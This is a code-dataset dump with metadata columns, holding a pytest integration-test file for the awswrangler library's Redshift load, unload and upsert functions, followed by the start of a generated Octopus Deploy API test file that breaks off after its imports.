hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8670e8bdc3947086e3b13d63bfe6e79202643355
| 29,702
|
py
|
Python
|
testing/test_awswrangler/test_redshift.py
|
asafepy/aws-data-wrangler
|
5cc6360eb8325fa79fc9abe3128ba7a5f40681fa
|
[
"Apache-2.0"
] | null | null | null |
testing/test_awswrangler/test_redshift.py
|
asafepy/aws-data-wrangler
|
5cc6360eb8325fa79fc9abe3128ba7a5f40681fa
|
[
"Apache-2.0"
] | null | null | null |
testing/test_awswrangler/test_redshift.py
|
asafepy/aws-data-wrangler
|
5cc6360eb8325fa79fc9abe3128ba7a5f40681fa
|
[
"Apache-2.0"
] | null | null | null |
import json
import logging
from datetime import date, datetime
from decimal import Decimal
import pytest
import boto3
import pandas as pd
from pyspark.sql import SparkSession
import pg8000
import awswrangler as wr
from awswrangler import Session, Redshift
from awswrangler.exceptions import InvalidRedshiftDiststyle, InvalidRedshiftDistkey, InvalidRedshiftSortstyle, InvalidRedshiftSortkey
logging.basicConfig(level=logging.INFO, format="[%(asctime)s][%(levelname)s][%(name)s][%(funcName)s] %(message)s")
logging.getLogger("awswrangler").setLevel(logging.DEBUG)
@pytest.fixture(scope="module")
def cloudformation_outputs():
response = boto3.client("cloudformation").describe_stacks(StackName="aws-data-wrangler-test")
outputs = {}
for output in response.get("Stacks")[0].get("Outputs"):
outputs[output.get("OutputKey")] = output.get("OutputValue")
yield outputs
@pytest.fixture(scope="module")
def session():
yield Session(spark_session=SparkSession.builder.appName("AWS Wrangler Test").getOrCreate())
@pytest.fixture(scope="module")
def bucket(session, cloudformation_outputs):
if "BucketName" in cloudformation_outputs:
bucket = cloudformation_outputs.get("BucketName")
session.s3.delete_objects(path=f"s3://{bucket}/")
else:
raise Exception("You must deploy the test infrastructure using SAM!")
yield bucket
session.s3.delete_objects(path=f"s3://{bucket}/")
@pytest.fixture(scope="module")
def redshift_parameters(cloudformation_outputs):
redshift_parameters = {}
if "RedshiftAddress" in cloudformation_outputs:
redshift_parameters["RedshiftAddress"] = cloudformation_outputs.get("RedshiftAddress")
else:
raise Exception("You must deploy the test infrastructure using SAM!")
if "Password" in cloudformation_outputs:
redshift_parameters["Password"] = cloudformation_outputs.get("Password")
else:
raise Exception("You must deploy the test infrastructure using SAM!")
if "RedshiftPort" in cloudformation_outputs:
redshift_parameters["RedshiftPort"] = cloudformation_outputs.get("RedshiftPort")
else:
raise Exception("You must deploy the test infrastructure using SAM!")
if "RedshiftRole" in cloudformation_outputs:
redshift_parameters["RedshiftRole"] = cloudformation_outputs.get("RedshiftRole")
else:
raise Exception("You must deploy the test infrastructure using SAM!")
yield redshift_parameters
@pytest.mark.parametrize(
"sample_name,mode,factor,diststyle,distkey,sortstyle,sortkey",
[
("micro", "overwrite", 1, "AUTO", "name", None, ["id"]),
("micro", "append", 2, None, None, "INTERLEAVED", ["id", "value"]),
("small", "overwrite", 1, "KEY", "name", "INTERLEAVED", ["id", "name"]),
("small", "append", 2, None, None, "INTERLEAVED", ["id", "name", "date"]),
("nano", "overwrite", 1, "ALL", None, "compound", ["id", "name", "date"]),
("nano", "append", 2, "ALL", "name", "INTERLEAVED", ["id"]),
],
)
def test_to_redshift_pandas(session, bucket, redshift_parameters, sample_name, mode, factor, diststyle, distkey,
sortstyle, sortkey):
if sample_name == "micro":
dates = ["date"]
if sample_name == "small":
dates = ["date"]
if sample_name == "nano":
dates = ["date", "time"]
dataframe = pd.read_csv(f"data_samples/{sample_name}.csv", parse_dates=dates, infer_datetime_format=True)
dataframe["date"] = dataframe["date"].dt.date
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/redshift-load/"
session.pandas.to_redshift(
dataframe=dataframe,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
diststyle=diststyle,
distkey=distkey,
sortstyle=sortstyle,
sortkey=sortkey,
mode=mode,
preserve_index=True,
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
assert len(dataframe.index) * factor == len(rows)
assert len(list(dataframe.columns)) + 1 == len(list(rows[0]))
@pytest.mark.parametrize(
"sample_name,mode,factor,diststyle,distkey,sortstyle,sortkey",
[
("micro", "overwrite", 1, "AUTO", "name", None, ["id"]),
("micro", "append", 2, None, None, "INTERLEAVED", ["id", "value"]),
("small", "overwrite", 1, "KEY", "name", "INTERLEAVED", ["id", "name"]),
("small", "append", 2, None, None, "INTERLEAVED", ["id", "name", "date"]),
("nano", "overwrite", 1, "ALL", None, "compound", ["id", "name", "date"]),
("nano", "append", 2, "ALL", "name", "INTERLEAVED", ["id"]),
],
)
def test_to_redshift_pandas_glue(session, bucket, redshift_parameters, sample_name, mode, factor, diststyle, distkey,
sortstyle, sortkey):
if sample_name == "micro":
dates = ["date"]
if sample_name == "small":
dates = ["date"]
if sample_name == "nano":
dates = ["date", "time"]
dataframe = pd.read_csv(f"data_samples/{sample_name}.csv", parse_dates=dates, infer_datetime_format=True)
dataframe["date"] = dataframe["date"].dt.date
path = f"s3://{bucket}/redshift-load/"
session.pandas.to_redshift(
dataframe=dataframe,
path=path,
schema="public",
table="test",
connection="aws-data-wrangler-redshift",
iam_role=redshift_parameters.get("RedshiftRole"),
diststyle=diststyle,
distkey=distkey,
sortstyle=sortstyle,
sortkey=sortkey,
mode=mode,
preserve_index=True,
)
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
assert len(dataframe.index) * factor == len(rows)
assert len(list(dataframe.columns)) + 1 == len(list(rows[0]))
def test_to_redshift_pandas_cast(session, bucket, redshift_parameters):
df = pd.DataFrame({
"id": [1, 2, 3],
"name": ["name1", "name2", "name3"],
"foo": [None, None, None],
"boo": [date(2020, 1, 1), None, None],
"bar": [datetime(2021, 1, 1), None, None]
})
schema = {"id": "BIGINT", "name": "VARCHAR", "foo": "REAL", "boo": "DATE", "bar": "TIMESTAMP"}
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/redshift-load/"
session.pandas.to_redshift(dataframe=df,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=False,
cast_columns=schema)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
assert len(df.index) == len(rows)
assert len(list(df.columns)) == len(list(rows[0]))
@pytest.mark.parametrize(
"sample_name,mode,factor,diststyle,distkey,exc,sortstyle,sortkey",
[
("micro", "overwrite", 1, "FOO", "name", InvalidRedshiftDiststyle, None, None),
("micro", "overwrite", 2, "KEY", "FOO", InvalidRedshiftDistkey, None, None),
("small", "overwrite", 1, "KEY", None, InvalidRedshiftDistkey, None, None),
("small", "overwrite", 1, None, None, InvalidRedshiftSortkey, None, ["foo"]),
("small", "overwrite", 1, None, None, InvalidRedshiftSortstyle, "foo", ["id"]),
],
)
def test_to_redshift_pandas_exceptions(session, bucket, redshift_parameters, sample_name, mode, factor, diststyle,
distkey, sortstyle, sortkey, exc):
dataframe = pd.read_csv(f"data_samples/{sample_name}.csv")
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/redshift-load/"
with pytest.raises(exc):
assert session.pandas.to_redshift(
dataframe=dataframe,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
diststyle=diststyle,
distkey=distkey,
sortstyle=sortstyle,
sortkey=sortkey,
mode=mode,
preserve_index=False,
)
con.close()
@pytest.mark.parametrize(
"sample_name,mode,factor,diststyle,distkey,sortstyle,sortkey",
[
("micro", "overwrite", 1, "AUTO", "name", None, ["id"]),
("micro", "append", 2, None, None, "INTERLEAVED", ["id", "value"]),
("small", "overwrite", 1, "KEY", "name", "INTERLEAVED", ["id", "name"]),
("small", "append", 2, None, None, "INTERLEAVED", ["id", "name", "date"]),
("nano", "overwrite", 1, "ALL", None, "compound", ["id", "name", "date"]),
("nano", "append", 2, "ALL", "name", "INTERLEAVED", ["id"]),
],
)
def test_to_redshift_spark(session, bucket, redshift_parameters, sample_name, mode, factor, diststyle, distkey,
sortstyle, sortkey):
path = f"data_samples/{sample_name}.csv"
if sample_name == "micro":
schema = "id SMALLINT, name STRING, value FLOAT, date DATE"
timestamp_format = "yyyy-MM-dd"
elif sample_name == "small":
schema = "id BIGINT, name STRING, date DATE"
timestamp_format = "dd-MM-yy"
elif sample_name == "nano":
schema = "id INTEGER, name STRING, value DOUBLE, date DATE, time TIMESTAMP"
timestamp_format = "yyyy-MM-dd"
dataframe = session.spark.read_csv(path=path,
schema=schema,
timestampFormat=timestamp_format,
dateFormat=timestamp_format,
header=True)
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
session.spark.to_redshift(
dataframe=dataframe,
path=f"s3://{bucket}/redshift-load/",
connection=con,
schema="public",
table="test",
iam_role=redshift_parameters.get("RedshiftRole"),
diststyle=diststyle,
distkey=distkey,
sortstyle=sortstyle,
sortkey=sortkey,
mode=mode,
min_num_partitions=2,
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
assert (dataframe.count() * factor) == len(rows)
assert len(list(dataframe.columns)) == len(list(rows[0]))
def test_to_redshift_spark_big(session, bucket, redshift_parameters):
dataframe = session.spark_session.createDataFrame(
pd.DataFrame({
"A": list(range(100_000)),
"B": list(range(100_000)),
"C": list(range(100_000))
}))
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
session.spark.to_redshift(
dataframe=dataframe,
path=f"s3://{bucket}/redshift-load/",
connection=con,
schema="public",
table="test",
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
min_num_partitions=10,
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
assert dataframe.count() == len(rows)
assert len(list(dataframe.columns)) == len(list(rows[0]))
def test_to_redshift_spark_bool(session, bucket, redshift_parameters):
dataframe = session.spark_session.createDataFrame(pd.DataFrame({"A": [1, 2, 3], "B": [True, False, True]}))
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
session.spark.to_redshift(
dataframe=dataframe,
path=f"s3://{bucket}/redshift-load-bool/",
connection="aws-data-wrangler-redshift",
schema="public",
table="test",
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
min_num_partitions=1,
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
assert dataframe.count() == len(rows)
assert len(list(dataframe.columns)) == len(list(rows[0]))
assert type(rows[0][0]) == int
assert type(rows[0][1]) == bool
def test_stress_to_redshift_spark_big(session, bucket, redshift_parameters):
print("Creating DataFrame...")
dataframe = session.spark_session.createDataFrame(pd.DataFrame({
"A": list(range(10_000)),
"B": list(range(10_000))
}))
dataframe.cache()
for i in range(10):
print(f"Run number: {i}")
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
session.spark.to_redshift(
dataframe=dataframe,
path=f"s3://{bucket}/redshift-load-{i}/",
connection=con,
schema="public",
table="test",
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
min_num_partitions=16,
)
con.close()
dataframe.unpersist()
@pytest.mark.parametrize(
"sample_name,mode,factor,diststyle,distkey,exc,sortstyle,sortkey",
[
("micro", "overwrite", 1, "FOO", "name", InvalidRedshiftDiststyle, None, None),
("micro", "overwrite", 2, "KEY", "FOO", InvalidRedshiftDistkey, None, None),
("small", "overwrite", 1, "KEY", None, InvalidRedshiftDistkey, None, None),
("small", "overwrite", 1, None, None, InvalidRedshiftSortkey, None, ["foo"]),
("small", "overwrite", 1, None, None, InvalidRedshiftSortstyle, "foo", ["id"]),
],
)
def test_to_redshift_spark_exceptions(session, bucket, redshift_parameters, sample_name, mode, factor, diststyle,
distkey, sortstyle, sortkey, exc):
path = f"data_samples/{sample_name}.csv"
dataframe = session.spark.read_csv(path=path)
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
with pytest.raises(exc):
assert session.spark.to_redshift(
dataframe=dataframe,
path=f"s3://{bucket}/redshift-load/",
connection=con,
schema="public",
table="test",
iam_role=redshift_parameters.get("RedshiftRole"),
diststyle=diststyle,
distkey=distkey,
sortstyle=sortstyle,
sortkey=sortkey,
mode=mode,
min_num_partitions=2,
)
con.close()
def test_write_load_manifest(session, bucket):
boto3.client("s3").upload_file("data_samples/small.csv", bucket, "data_samples/small.csv")
object_path = f"s3://{bucket}/data_samples/small.csv"
manifest_path = f"s3://{bucket}/manifest.json"
session.redshift.write_load_manifest(manifest_path=manifest_path, objects_paths=[object_path])
manifest_json = (boto3.client("s3").get_object(Bucket=bucket, Key="manifest.json").get("Body").read())
manifest = json.loads(manifest_json)
assert manifest.get("entries")[0].get("url") == object_path
assert manifest.get("entries")[0].get("mandatory")
assert manifest.get("entries")[0].get("meta").get("content_length") == 2247
def test_connection_timeout(redshift_parameters):
with pytest.raises(pg8000.core.InterfaceError):
Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=12345,
user="test",
password=redshift_parameters.get("Password"),
)
def test_connection_with_different_port_types(redshift_parameters):
conn = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=str(redshift_parameters.get("RedshiftPort")),
user="test",
password=redshift_parameters.get("Password"),
)
conn.close()
conn = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=float(redshift_parameters.get("RedshiftPort")),
user="test",
password=redshift_parameters.get("Password"),
)
conn.close()
def test_to_redshift_pandas_decimal(session, bucket, redshift_parameters):
df = pd.DataFrame({
"id": [1, 2, 3],
"decimal_2": [Decimal((0, (1, 9, 9), -2)), None, Decimal((0, (1, 9, 0), -2))],
"decimal_5": [Decimal((0, (1, 9, 9, 9, 9, 9), -5)), None,
Decimal((0, (1, 9, 0, 0, 0, 0), -5))],
})
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/redshift-load/"
session.pandas.to_redshift(
dataframe=df,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=False,
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test")
rows = cursor.fetchall()
cursor.close()
con.close()
assert len(df.index) == len(rows)
assert len(list(df.columns)) == len(list(rows[0]))
for row in rows:
if row[0] == 1:
assert row[1] == Decimal((0, (1, 9, 9), -2))
assert row[2] == Decimal((0, (1, 9, 9, 9, 9, 9), -5))
elif row[1] == 2:
assert row[1] is None
assert row[2] is None
elif row[2] == 3:
assert row[1] == Decimal((0, (1, 9, 0), -2))
assert row[2] == Decimal((0, (1, 9, 0, 0, 0, 0), -5))
def test_to_redshift_spark_decimal(session, bucket, redshift_parameters):
df = session.spark_session.createDataFrame(pd.DataFrame({
"id": [1, 2, 3],
"decimal_2": [Decimal((0, (1, 9, 9), -2)), None, Decimal((0, (1, 9, 0), -2))],
"decimal_5": [Decimal((0, (1, 9, 9, 9, 9, 9), -5)), None,
Decimal((0, (1, 9, 0, 0, 0, 0), -5))]
}),
schema="id INTEGER, decimal_2 DECIMAL(3,2), decimal_5 DECIMAL(6,5)")
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/redshift-load2/"
session.spark.to_redshift(
dataframe=df,
path=path,
schema="public",
table="test2",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
)
cursor = con.cursor()
cursor.execute("SELECT * from public.test2")
rows = cursor.fetchall()
cursor.close()
con.close()
assert df.count() == len(rows)
assert len(list(df.columns)) == len(list(rows[0]))
for row in rows:
if row[0] == 1:
assert row[1] == Decimal((0, (1, 9, 9), -2))
assert row[2] == Decimal((0, (1, 9, 9, 9, 9, 9), -5))
elif row[1] == 2:
assert row[1] is None
assert row[2] is None
elif row[2] == 3:
assert row[1] == Decimal((0, (1, 9, 0), -2))
assert row[2] == Decimal((0, (1, 9, 0, 0, 0, 0), -5))
def test_to_parquet(session, bucket, redshift_parameters):
n: int = 1_000_000
df = pd.DataFrame({"id": list((range(n))), "name": list(["foo" if i % 2 == 0 else "boo" for i in range(n)])})
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/test_to_parquet/"
session.pandas.to_redshift(
dataframe=df,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=True,
)
path = f"s3://{bucket}/test_to_parquet2/"
paths = session.redshift.to_parquet(sql="SELECT * FROM public.test",
path=path,
iam_role=redshift_parameters.get("RedshiftRole"),
connection=con,
partition_cols=["name"])
assert len(paths) == 4
@pytest.mark.parametrize("sample_name", ["micro", "small", "nano"])
def test_read_sql_redshift_pandas(session, bucket, redshift_parameters, sample_name):
if sample_name == "micro":
dates = ["date"]
elif sample_name == "small":
dates = ["date"]
else:
dates = ["date", "time"]
df = pd.read_csv(f"data_samples/{sample_name}.csv", parse_dates=dates, infer_datetime_format=True)
df["date"] = df["date"].dt.date
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/test_read_sql_redshift_pandas/"
session.pandas.to_redshift(
dataframe=df,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=True,
)
path2 = f"s3://{bucket}/test_read_sql_redshift_pandas2/"
df2 = session.pandas.read_sql_redshift(sql="select * from public.test",
iam_role=redshift_parameters.get("RedshiftRole"),
connection=con,
temp_s3_path=path2)
assert len(df.index) == len(df2.index)
assert len(df.columns) + 1 == len(df2.columns)
def test_read_sql_redshift_pandas2(session, bucket, redshift_parameters):
n: int = 1_000_000
df = pd.DataFrame({"id": list((range(n))), "val": list(["foo" if i % 2 == 0 else "boo" for i in range(n)])})
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
path = f"s3://{bucket}/test_read_sql_redshift_pandas2/"
session.pandas.to_redshift(
dataframe=df,
path=path,
schema="public",
table="test",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=True,
)
path2 = f"s3://{bucket}/test_read_sql_redshift_pandas22/"
df2 = session.pandas.read_sql_redshift(sql="select * from public.test",
iam_role=redshift_parameters.get("RedshiftRole"),
connection=con,
temp_s3_path=path2)
wr.s3.delete_objects(path=f"s3://{bucket}/")
assert len(df.index) == len(df2.index)
assert len(df.columns) + 1 == len(df2.columns)
def test_to_redshift_pandas_upsert(session, bucket, redshift_parameters):
wr.s3.delete_objects(path=f"s3://{bucket}/")
con = Redshift.generate_connection(
database="test",
host=redshift_parameters.get("RedshiftAddress"),
port=redshift_parameters.get("RedshiftPort"),
user="test",
password=redshift_parameters.get("Password"),
)
df = pd.DataFrame({"id": list((range(1_000))), "val": list(["foo" if i % 2 == 0 else "boo" for i in range(1_000)])})
df3 = pd.DataFrame({
"id": list((range(1_000, 1_500))),
"val": list(["foo" if i % 2 == 0 else "boo" for i in range(500)])
})
for i in range(10):
print(f"run: {i}")
# CREATE
path = f"s3://{bucket}/test_to_redshift_pandas_upsert/"
session.pandas.to_redshift(dataframe=df,
path=path,
schema="public",
table="test_upsert",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=True,
primary_keys=["id"])
path = f"s3://{bucket}/test_to_redshift_pandas_upsert2/"
df2 = session.pandas.read_sql_redshift(sql="select * from public.test_upsert",
iam_role=redshift_parameters.get("RedshiftRole"),
connection=con,
temp_s3_path=path)
assert len(df.index) == len(df2.index)
assert len(df.columns) + 1 == len(df2.columns)
# UPSERT
path = f"s3://{bucket}/test_to_redshift_pandas_upsert3/"
session.pandas.to_redshift(dataframe=df3,
path=path,
schema="public",
table="test_upsert",
connection=con,
iam_role=redshift_parameters.get("RedshiftRole"),
mode="upsert",
preserve_index=True,
primary_keys=["id"])
path = f"s3://{bucket}/test_to_redshift_pandas_upsert4/"
df4 = session.pandas.read_sql_redshift(sql="select * from public.test_upsert",
iam_role=redshift_parameters.get("RedshiftRole"),
connection=con,
temp_s3_path=path)
assert len(df.index) + len(df3.index) == len(df4.index)
assert len(df.columns) + 1 == len(df2.columns)
wr.s3.delete_objects(path=f"s3://{bucket}/")
con.close()
@pytest.mark.parametrize("sample_name", ["micro", "small", "nano"])
def test_read_sql_redshift_pandas_glue_conn(session, bucket, redshift_parameters, sample_name):
if sample_name == "micro":
dates = ["date"]
elif sample_name == "small":
dates = ["date"]
else:
dates = ["date", "time"]
df = pd.read_csv(f"data_samples/{sample_name}.csv", parse_dates=dates, infer_datetime_format=True)
df["date"] = df["date"].dt.date
path = f"s3://{bucket}/test_read_sql_redshift_pandas_glue_conn/"
session.pandas.to_redshift(
dataframe=df,
path=path,
schema="public",
table="test",
connection="aws-data-wrangler-redshift",
iam_role=redshift_parameters.get("RedshiftRole"),
mode="overwrite",
preserve_index=True,
)
path2 = f"s3://{bucket}/test_read_sql_redshift_pandas_glue_conn2/"
df2 = session.pandas.read_sql_redshift(sql="select * from public.test",
iam_role=redshift_parameters.get("RedshiftRole"),
connection="aws-data-wrangler-redshift",
temp_s3_path=path2)
assert len(df.index) == len(df2.index)
assert len(df.columns) + 1 == len(df2.columns)
| 39.340397
| 133
| 0.588311
| 3,216
| 29,702
| 5.291978
| 0.080535
| 0.106822
| 0.093778
| 0.020624
| 0.846818
| 0.8155
| 0.796933
| 0.782831
| 0.756331
| 0.744345
| 0
| 0.018215
| 0.266211
| 29,702
| 754
| 134
| 39.392573
| 0.762652
| 0.000438
| 0
| 0.728058
| 0
| 0.001439
| 0.182342
| 0.055548
| 0
| 0
| 0
| 0
| 0.066187
| 1
| 0.033094
| false
| 0.028777
| 0.017266
| 0
| 0.05036
| 0.004317
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8679b85bf67b7e1a956afa090547b658be1e4d79
| 9,601
|
py
|
Python
|
test/test_releases_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
test/test_releases_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
test/test_releases_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
